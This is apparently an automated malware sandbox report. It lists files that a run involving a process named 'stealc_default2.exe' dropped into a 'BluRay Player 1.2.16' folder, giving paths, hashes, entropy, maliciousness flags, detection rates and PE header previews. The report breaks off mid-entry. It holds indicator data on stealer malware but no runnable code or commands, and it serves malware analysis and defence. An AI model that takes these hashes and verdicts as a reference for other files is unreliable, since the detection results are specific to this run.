File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\blurayplayer32.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	4732416
Entropy (8bit):	6.284847018075086
Encrypted:	false
SSDEEP:	98304:3B0VvGRdOWlXpO8U1+u3G2fG6HlVLHB1CgTe15W+:WVvB37f7HDb2
MD5:	72DFEB99DAF355DDE1A7CD0482A98954
SHA1:	BBE61F570508446222CFBEBCC2A648199085B95D
SHA-256:	C1E5AA5CE3B549CFC00285B701F0C074DC66A6087C6ED7F275619C30E7067A70
SHA-512:	B7DBF6278139E994E58E1180C45F568473B3093CD3CF5AD30BBEE30EBDEE579FCF2ACD9781FD20CCA401290A1D2539B762E8097AAC05EC45287B880854D9217A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 46%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....y.L..........#......."...%......{"......."...@...........................H......cH.......................................".......#.h.%..........................................................................."..............................text.....".......".................`....rdata...0...."..2....".............@..@.data...X.....#..2....".............@....rsrc.....%...#...%..(#.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-1FNCS.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	337171
Entropy (8bit):	6.46334441651647
Encrypted:	false
SSDEEP:	3072:TQkk4LTVKDKajZjp8aEEHeEkls4q5dRIFSqObK/q+P82JSccgSGDGxQXKHlTmn93:3kwpKlf1QNSqOb6q+PRJb6GDGmKH893
MD5:	51D62C9C7D56F2EF2F0F628B8FC249AD
SHA1:	33602785DE6D273F0CE7CA65FE8375E91EF1C0BC
SHA-256:	FC3C82FAB6C91084C6B79C9A92C08DD6FA0659473756962EFD6D8F8418B0DD50
SHA-512:	03FB13AE5D73B4BABA540E3358335296FB28AA14318C27554B19BB1E90FAD05EA2DD66B3DB216EA7EED2A733FE745E66DB2E638F5ED3B0206F5BE377F931DF5B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...2..............#......................... .....c.........................`................ ..........................8........... .......................0.../......................................................`............................text...............................`.P`.data...`.... ......................@.0..rdata..4....0......................@.`@/4......D...........................@.0@.bss..................................`..edata...8.......:...p..............@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc........ ......................@.0..reloc.../...0...0..................@.0B........................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-2MA22.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	509934
Entropy (8bit):	6.031080686301204
Encrypted:	false
SSDEEP:	6144:wx/Eqtn5oeHkJstujMWYVgUr/MSK/zwazshLKl11PC5qLJy1Pkfsm:M/NDXEJIPVgUrgbzslW11UqLJokfsm
MD5:	02E6C6AB886700E6F184EEE43157C066
SHA1:	E796B7F7762BE9B90948EB80D0138C4598700ED9
SHA-256:	EA53A198AA646BED0B39B40B415602F8C6DC324C23E1B9FBDCF7B416C2C2947D
SHA-512:	E72BC0A2E9C20265F1471C30A055617CA34DA304D7932E846D5D6999A8EBCC0C3691FC022733EAEB74A25C3A6D3F347D3335B902F170220CFE1DE0340942B596
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........P......#...............................k......................... ......CY........ .....................................................................................................................\|...,............................text...T...........................`.P`.data...............................@.0..rdata..XN.......P..................@.`@/4.......x...0...z..................@.0@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..............................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-71E5U.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	718497
Entropy (8bit):	6.514957029959331
Encrypted:	false
SSDEEP:	12288:TTPcYn5c/rPx37/zHBA6a5UeYpChr1CERdSrNdyR6y3o1a+mxyFz:HPcYn5c/rPx37/zHBA6pFpCZ1CEuy3op
MD5:	83883DB30CB1CCCC6AF3B89977C65EAD
SHA1:	5411F15732F1C035E12B4B384ED401A7313712E9
SHA-256:	82BA978F9C5360F23FD9AECFD4C9B06F2E3E3AD535C02E57099619A9CA96D44D
SHA-512:	55721D91D2B8D9B0BE6C962013FAF2642811B45F35016A507B2209109329CCF5BE071C9A118C9ABEE12FBB142E97364210E9E2AB3775400B8291CD82E8E7B838
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@...............................%..................................................................................................................CODE....@........................... ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................V..............@..P........................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-7L9K5.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	235032
Entropy (8bit):	6.398850087061798
Encrypted:	false
SSDEEP:	6144:fWa7MVS9CtXk4wP0filbZ5546Qx/cwx/svQbKDazN1x:3MVTtXlwP0f0rK6QxEYz
MD5:	E1D0ACD1243F9E59491DC115F4E379A4
SHA1:	5E9010CFA8D75DEFBDC3FB760EB4229ACF66633B
SHA-256:	FD574DA66B7CCAE6F4DF31D5E2A2C7F9C5DAE6AE9A8E5E7D2CA2056AB29A8C4F
SHA-512:	392AA2CF6FBC6DAA6A374FD1F34E114C21234061855413D375383A97951EC5DDDF91FD1C431950045105746898E77C5C5B4D217DF0031521C69403EA6ADE5C27
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........Y......#..............................tp.......................................... .........................$...............................................................................................<............................text...............................`.P`.data...L...........................@.0..rdata...1.......2..................@.`@/4.......m... ...n..................@.0@.bss..................................`..edata..$............`..............@.0@.idata...............j..............@.0..CRT....,............t..............@.0..tls.... ............v..............@.0..reloc...............x..............@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-A2FGH.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	463112
Entropy (8bit):	6.363613724826455
Encrypted:	false
SSDEEP:	12288:qyoSS9Gy176UixTUTfeKEVfA/K4FW0BGXOjY:pS93176nxTUTEA/Kuk
MD5:	D9D9C79E35945FCA3F9D9A49378226E7
SHA1:	4544A47D5B9765E5717273AAFF62724DF643F8F6
SHA-256:	18CBD64E56CE58CE7D1F67653752F711B30AD8C4A2DC4B0DE88273785C937246
SHA-512:	B0A9CEFAC7B4140CC07E880A336DCBAB8B6805E267F4F8D9423111B95E4D13544D8952D75AB51ADE9F6DACE93A5425E6D41F42C2AA88D3A3C233E340EE785EB9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........V.........#.........R....................lf.......................................... ......................@..w.......................................<....................................................................................text...$...........................`.P`.data... ...........................@.0..rdata...J.......L..................@.`@/4..................................@.0@.bss....h....0........................`..edata..w....@......................@.0@.idata..............................@.0..CRT....,............4..............@.0..tls.... ............6..............@.0..reloc..<............8..............@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-AD0KH.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	174543
Entropy (8bit):	6.3532700320638025
Encrypted:	false
SSDEEP:	3072:F4yjzZ0q/RZ1vAjhByeVjxSTi7p2trtfKomZr8jPnJe0rkUlRGptdKH69T5GNg9v:FjjE0PCn3baPXuD7
MD5:	65D8CB2733295758E5328E5A3E1AFF15
SHA1:	F2378928BB9CCFBA566EC574E501F6A82A833143
SHA-256:	E9652AB77A0956C5195970AF39778CFC645FC5AF22B95EED6D197DC998268642
SHA-512:	BF6AA62EA82DFDBE4BC42E4D83469D3A98BFFE89DBAB492F8C60552FCB70BBA62B8BF7D4BDAB4045D9BC1383A423CAA711E818F2D8816A80B056BC65A52BC171
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........g......#...............................c................................6......... .........................Y@......................................0....................................................................................text...D...........................`.P`.data...............................@.`..rdata..0".......$..................@.`@/4.......Z.......\..................@.0@.bss....t....p........................`..edata..Y@.......B...8..............@.0@.idata...............z..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..0...........................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-ADJOR.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	248694
Entropy (8bit):	6.346971642353424
Encrypted:	false
SSDEEP:	6144:MUijoruDtud8kVtHvBcEcEJAbNkhJIXM3rhv:Cy8kTHvBcE1kI3rhv
MD5:	39A15291B9A87AEE42FBC46EC1FE35D6
SHA1:	AADF88BBB156AD3CB1A2122A3D6DC017A7D577C1
SHA-256:	7D4546773CFCC26FEC8149F6A6603976834DC06024EEAC749E46B1A08C1D2CF4
SHA-512:	FF468FD93EFDB22A20590999BC9DD68B7307BD406EB3746C74A3A472033EA665E6E3F778325849DF9B0913FFC7E4700E2BEED4666DA6E713D984E92F9DB5F679
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........w......#.....x.........................i.......................................... ......................`..u........1...................................................................................................................text...Tw.......x..................`.P`.data................\|..............@.`..rdata..t;.......<...~..............@.`@/4.......f.......h..................@.0@.bss.........P........................`..edata..u....`......."..............@.0@.idata...1.......2...>..............@.0..CRT....,............p..............@.0..tls.... ............r..............@.0..reloc...............t..............@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-ANM55.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	data
Category:	dropped
Size (bytes):	4732416
Entropy (8bit):	6.284846919763324
Encrypted:	false
SSDEEP:	98304:IB0VvGRdOWlXpO8U1+u3G2fG6HlVLHB1CgTe15W+:zVvB37f7HDb2
MD5:	C7E575364669A32EC6C3454169E1309F
SHA1:	7349BD432CDDC9DE5CA7BCA0208EFC12381D35B4
SHA-256:	6057CFE423768BB892A99BFCC6F7F26C6287CA8480D96911C2B63A7103C5DB15
SHA-512:	BE7D5A42B43AF6E146C412C5B216CC3F5E3FEE54EC49B130034869E12ED002B52CFD0CBF09ED647A7899F24D1B730E0F6405FB60A68EABE292E77A5DC3E78BE7
Malicious:	false
Preview:	.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....y.L..........#......."...%......{"......."...@...........................H......cH.......................................".......#.h.%..........................................................................."..............................text.....".......".................`....rdata...0...."..2....".............@..@.data...X.....#..2....".............@....rsrc.....%...#...%..(#.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-C986N.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	397808
Entropy (8bit):	6.396146399966879
Encrypted:	false
SSDEEP:	6144:q6WhfTNgMVVPwCxpk76CcIAg8TQfn9l1bBE3A97vupNBXH:q60TvSGpk7eIAg489l1S3A97vkVH
MD5:	E0747D2E573E0A05A7421C5D9B9D63CC
SHA1:	C45FC383F9400F8BBE0CA8E6A7693AA0831C1DA7
SHA-256:	25252B18CE0D80B360A6DE95C8B31E32EFD8034199F65BF01E3612BD94ABC63E
SHA-512:	201EE6B2FD8DCD2CC873726D56FD84132A4D8A7434B581ABD35096A5DE377009EC8BC9FEA2CC223317BBD0D971FB1E61610509E90B76544BDFF069E0D6929AED
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 2%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\4......n......#......................... ....Dk.......................................... ..........................5...0...............................`..T............................P.......................2...............................text...D...........................`.P`.data...X1... ...2..................@.`..rdata..x....`.......F..............@.`@/4..................................@.0@.bss....`.............................`..edata...5.......6..................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.... ....P......................@.0..reloc..T....`......................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-EOQJN.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	259014
Entropy (8bit):	6.075222655669795
Encrypted:	false
SSDEEP:	3072:O4WGkOMuCsxvlBUlthMP3SyyqX3/yfGG7ca/RM3yH8Tw/yr+Jg8jGCzftns9/1tA:tWGkOME304A7ca/RNyN8jGCzftngvA
MD5:	B4FDE05A19346072C713BE2926AF8961
SHA1:	102562DE2240042B654C464F1F22290676CB6E0F
SHA-256:	513CEC3CCBE4E0B31542C870793CCBDC79725718915DB0129AA39035202B7F97
SHA-512:	9F3AEE3EBF04837CEEF08938795DE0A044BA6602AACB98DA0E038A163119C695D9CC2CA413BD709196BFD3C800112ABABC3AF9E2E9A0C77D88BD4A1C88C2ED27
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#..............................xe.........................@.......{........ .........................+;......L.......0.................... ..8...................................................h................................text...............................`.P`.data...$...........................@.0..rdata.../.......0..................@.`@/4.......l.......n..................@.0@.bss....,.............................`..edata..+;.......<...d..............@.0@.idata..L...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...0...........................@.0..reloc..8.... ......................@.0B........................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-EQ0NL.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	448557
Entropy (8bit):	6.353356595345232
Encrypted:	false
SSDEEP:	12288:TC5WwqtP7JRSIOKxQg2FgggggggTggZgoggggggggggggggggggnggDggD7d:TC5WltP7JRSIOKxmeR
MD5:	908111F583B7019D2ED3492435E5092D
SHA1:	8177C5E3B4D5CC1C65108E095D07E0389164DA76
SHA-256:	E8E2467121978653F9B6C69D7637D8BE1D0AC6A4028B672A9B937021AD47603C
SHA-512:	FD35BACAD03CFA8CD1C0FFF2DAC117B07F516E1E37C10352ED67E645F96E31AC499350A2F21702EB51BE83C05CF147D0876DAC34376EEDE676F3C7D4E4A329CB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 2%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....,...................@.....i......................... ......._........ .........................[.......X...............................(&...................................................... ............................text...d*.......,..................`.P`.data........@.......0..............@.`..rdata......P.......2..............@.`@/4..................................@.0@.bss....\|.............................`..edata..[............j..............@.0@.idata..X...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..(&.......(..................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-EV6NO.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	706136
Entropy (8bit):	6.517672165992715
Encrypted:	false
SSDEEP:	12288:8TCY9iAO+e+693qCfG0l2KDIq4N1i9aqi+:8piAO+e+69ne02KDINN1MaZ+
MD5:	3A8A13F0215CDA541EC58F7C80ED4782
SHA1:	085C3D5F62227319446DD61082919F6BE1EFD162
SHA-256:	A397C9C2B5CAC7D08A2CA720FED9F99ECE72078114FFC86DF5DBC2B53D5FA1AD
SHA-512:	4731D7ABB8DE1B77CB8D3F63E95067CCD7FAFED1FEB508032CB41EE9DB3175C69E5D244EEE8370DE018140D7B1C863A4E7AFBBE58183294A0E7CD98F2A8A0EAD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...t.......Q......#..............................Pe......................... ................ .........................A.......L............................... ,......................................................,............................text...8...........................`.P`.data...............................@.P..rdata..............................@.`@/4......\............x..............@.0@.bss..................................`..edata..A........ ...^..............@.0@.idata..L............~..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc.. ,..........................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-F3PSE.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	30994
Entropy (8bit):	5.666281517516177
Encrypted:	false
SSDEEP:	768:SrCNSOFBZVDIxxDsIpx0uZjaYNdJSH6J6:SrCyx0maYNdh6
MD5:	3C033F35FE26BC711C4D68EB7CF0066D
SHA1:	83F1AED76E6F847F6831A1A1C00FEDC50F909B81
SHA-256:	9BA147D15C8D72A99BC639AE173CFF2D22574177242A7E6FE2E9BB09CC3D5982
SHA-512:	7811BE5CCBC27234CE70AB4D6541556612C45FE81D5069BA64448E78953387B1C023AA2A04E5DBF8CAACE7291B8B020BEE2F794FBC190837F213B8D6CB698860
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........p..8......#........l...............@.....j.......................................... .........................a.......(...............................x...................................................,................................text...8(.........................`.P`.data... ....@......................@.0..rdata.......P.......0..............@.0@/4...........`.......6..............@.0@.bss..................................`..edata..a............L..............@.0@.idata..(............`..............@.0..CRT....,............h..............@.0..tls.... ............j..............@.0..reloc..x............l..............@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-IKC0D.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	181527
Entropy (8bit):	6.362061002967905
Encrypted:	false
SSDEEP:	3072:jJoxZgqj/2VkWePT1lempKE7PQrXGx6duqPhyxO+jOfMjHyv:jef/2eH72mprIs6VyfOfMY
MD5:	0D0D311D1837705B1EAFBC5A85A695BD
SHA1:	AA7FA3EB181CC5E5B0AA240892156A1646B45184
SHA-256:	AFB9779C4D24D0CE660272533B70D2B56704F8C39F63DAB0592C203D8AE74673
SHA-512:	14BC65823B77E192AACF613B65309D5A555A865AC00D2AB422FD209BD4E6C106ECCE12F868692C3EEA6DCCB3FE4AD6323984AEF60F69DA08888ABCD98D76327D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..............#..............................Te......................... ................ .........................b........#......................................................................................H............................text...$...........................`.P`.data...4...........................@.0..rdata...J.......L..................@.`@/4.......I... ...J..................@.0@.bss.........p........................`..edata..b............@..............@.0@.idata...#.......$...V..............@.0..CRT....,............z..............@.0..tls.... ............\|..............@.0..rsrc................~..............@.0..reloc..............................@.0B........................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-IRAOB.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	171848
Entropy (8bit):	6.579154579239999
Encrypted:	false
SSDEEP:	3072:LrhG5+L/AcY680k2SxVqetJP5Im+A9mNoWqlM5ywwoS:LV6+LA0G0enP5PFYOWi6w1
MD5:	236A679AB1B16E66625AFBA86A4669EB
SHA1:	73AE354886AB2609FFA83429E74D8D9F34BD45F2
SHA-256:	B1EC758B6EDD3E5B771938F1FEBAC23026E6DA2C888321032D404805E2B05500
SHA-512:	C19FA027E2616AC6B4C18E04959DFE081EF92F49A11260BA69AFE10313862E8FEFF207B9373A491649928B1257CF9B905F24F073D11D71DCD29B0F9ADAC80248
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... ......;......#...............................c................................q......... .........................,.......<.......H...........................................................................(................................text...............................`.P`.data... ...........................@.0..rdata..\|y.......z..................@.`@/4......HN...@...P... ..............@.0@.bss..................................`..edata..,............p..............@.0@.idata..<............~..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...H...........................@.0..reloc..............................@.0B........................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-JIOLC.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	140752
Entropy (8bit):	6.52778891175594
Encrypted:	false
SSDEEP:	3072:Uw0ucwd0gZ36KErK+i+35KwO/hVQN6ulXazERIdF+aP2je8g5og96:ZlcWpErK+i9zEQF+aPKZo6
MD5:	A8F646EB087F06F5AEBC2539EB14C14D
SHA1:	4B1FBAB6C3022C3790BC0BD0DD2D9F3BA8FF1759
SHA-256:	A446F09626CE7CE63781F5864FDD6064C25D9A867A0A1A07DCECB4D5044B1C2B
SHA-512:	93BB40C5FE93EF97FE3BC82A0A85690C7B434BD0327BB8440D51053005A5E5B855F9FCC1E9C676C43FF50881F860817FF0764C1AD379FC08C4920AA4A42C5DBC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 2%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........w......#.....T...................p.....a.......................................... ......................0.......@.......p..@.......................T............................`......................8B...............................text....R.......T..................`.P`.data........p.......X..............@.`..rdata...F.......H...\..............@.`@/4......L3.......4..................@.0@.bss....@.............................`..edata.......0......................@.0@.idata.......@......................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..rsrc...@....p......................@.0..reloc..T...........................@.0B........................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-K2BT4.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	121524
Entropy (8bit):	6.347995296737745
Encrypted:	false
SSDEEP:	1536:9v6EzEhAArrzEYz8V2clMs4v6C7382gYbByUDM6H0ZulNDnt8zXxgf:9T8AArrzDylMs5C738FYbpH0Ent8zBgf
MD5:	6CE25FB0302F133CC244889C360A6541
SHA1:	352892DD270135AF5A79322C3B08F46298B6E79C
SHA-256:	E06C828E14262EBBE147FC172332D0054502B295B0236D88AB0DB43326A589F3
SHA-512:	3605075A7C077718A02E278D686DAEF2E8D17B160A5FEDA8D2B6E22AABFFE0105CC72279ADD9784AC15139171C7D57DBA2E084A0BA22A6118FDBF75699E53F63
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....8r>....7......#.....^...................p.....n.........................0................ ........................._.................................... .......................................................................................text...X].......^..................`.P`.data... ....p.......b..............@.0..rdata........... ...d..............@.`@/4...............0..................@.0@.bss....(.............................`..edata.._...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc....... ......................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-KC0R0.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	92019
Entropy (8bit):	5.974787373427489
Encrypted:	false
SSDEEP:	1536:+j80nVGEhJyBnvQXUDkUPoWCSgZosDGMsZLXWU9+HN4yoRtJJ:C8IgtyUDkBWIZosDGDBXWPHN4yoRtJJ
MD5:	CC7DAD980DD04E0387795741D809CBF7
SHA1:	A49178A17B1C72AD71558606647F5011E0AA444B
SHA-256:	0BAE9700E29E4E7C532996ADF6CD9ADE818F8287C455E16CF2998BB0D02C054B
SHA-512:	E4441D222D7859169269CA37E491C37DAA6B3CDD5F4A05A0A246F21FA886F5476092E64DFF88890396EF846B9E8D2880E33F1F594CD61F09023B3EF4CD573EA3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(....0..7......#.........,.....................m................................B......... ...................... .......0..............................................................p......................t5...............................text..............................`.P`.data... ...........................@.0..rdata..............................@.`@/4.......(.........................@.0@.bss..................................`..edata....... ......................@.0@.idata...*...0...,..................@.0..CRT....,....`....... ..............@.0..tls.... ....p......."..............@.0..rsrc................$..............@.0..reloc...............(..............@.0B........................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-LD4GG.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	441975
Entropy (8bit):	6.372283713065844
Encrypted:	false
SSDEEP:	6144:KOjlUsee63NlC1NiiA0XcQj0S5XTJAmLYWB6EYWOsIEvCmiu:DRGNq0wdAmcWBGsIEviu
MD5:	6CD78C8ADD1CFC7CBB85E2B971FCC764
